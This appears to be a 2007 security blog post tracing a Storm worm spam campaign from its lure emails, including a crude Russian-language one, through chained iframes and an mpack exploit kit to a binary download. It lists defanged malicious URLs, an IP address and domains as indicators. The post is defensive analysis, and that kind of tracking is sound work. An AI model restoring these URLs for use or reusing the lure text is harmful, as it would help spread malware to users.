DISOG: Stormworm - iframe hell.

This morning we started receiving dual language Storm worm Emails:

From: fuzzarnsjjvr@sdc-dsc.gc.ca
Date: Sep 28, 2007 7:12 AM
Subject: Don't forget to play a game today
To: me

Too many hot games to mention; get 1000 free games. http://68.77.xx.xx/

Смотри что о тебе пишут,ну ты и сука,смотрите все! вот адресс
http:// bl0cker.info/ suki .php?new=pidori

(Spaces and xx's added to protect from accidental clicks)

The Russian suki.php page doesn't yet resolve (404 error) however there is an index page and it has javascript iframes pointing to

http:// 58.65.239.66 /~lem0n/st/go.php?sid=1
http:// 58.65.239.66 /~lem0n/st/go.php?sid=2
http:// 58.65.239.66 /~lem0n/st/go.php?sid=3
http:// 58.65.239.66 /~lem0n/st/go.php?sid=4

the sid=1 sid=2 and sid=3 pages are all fake error pages with more iframes:

http:// bl0cker.info /mail/cn.php
http:// lem0n.info /xxx/iframe.php
http:// lem0n.info /xxx/m/iframe.php
http:// bl0cker.org /xxx/iframe.php
http:// space-sms.info /xxx/iframe.php
http:// bl0cker.info /bn/index.php

sid=4 is a javascript encoded page that trys to download http:// bl0cker.info /bn/exe.php

So how deep can it get? I followed the white rabbit through a few more links:

cn.php is an iframe that points to http:// eliteproject.cn /ts/in.cgi?alex

lem0n.info /xxx/iframe.php is a javascript that points to http:// bl0cker.info /bn/index.php

lem0n.info /xxx /m/iframe.php: is a lot of errors:

Warning: fopen(redir.txt) [function.fopen]: failed to open stream:
Permission denied in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 40

Warning: flock() expects parameter 1 to be resource, boolean
given in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 41

Warning: ftruncate(): supplied argument is not a valid stream
resource in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 42

Warning: fwrite(): supplied argument is not a valid stream
resource in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 43

Same errors in http://bl0cker.org /xxx/iframe.php and http:// space-sms.info /xxx/iframe.php.

eliteproject.cn /ts/ in.cgi?alex is an mpack that points to http:// superengine.cn /1278/file.php (binary file)

In summary, possible new Storm domains:

superengine.cn
eliteproject.cn
space-sms.info
lem0n.info
bl0cker.org
bl0cker.info

None of these are fastflux --yet.

Space-sms, lem0n.info, bl0cker.org and bl0cker.info all use the same name servers, ns1 and ns2.spektor.ws.

NS2 points to the same IP (58.65.239.66) as the A records for the new domains.

Labels: CME711, Iframes, nuwar, peacomm, peed, Storm, xored javascript

Friday, September 28, 2007

Stormworm - iframe hell.

1 Comments:

Previous Posts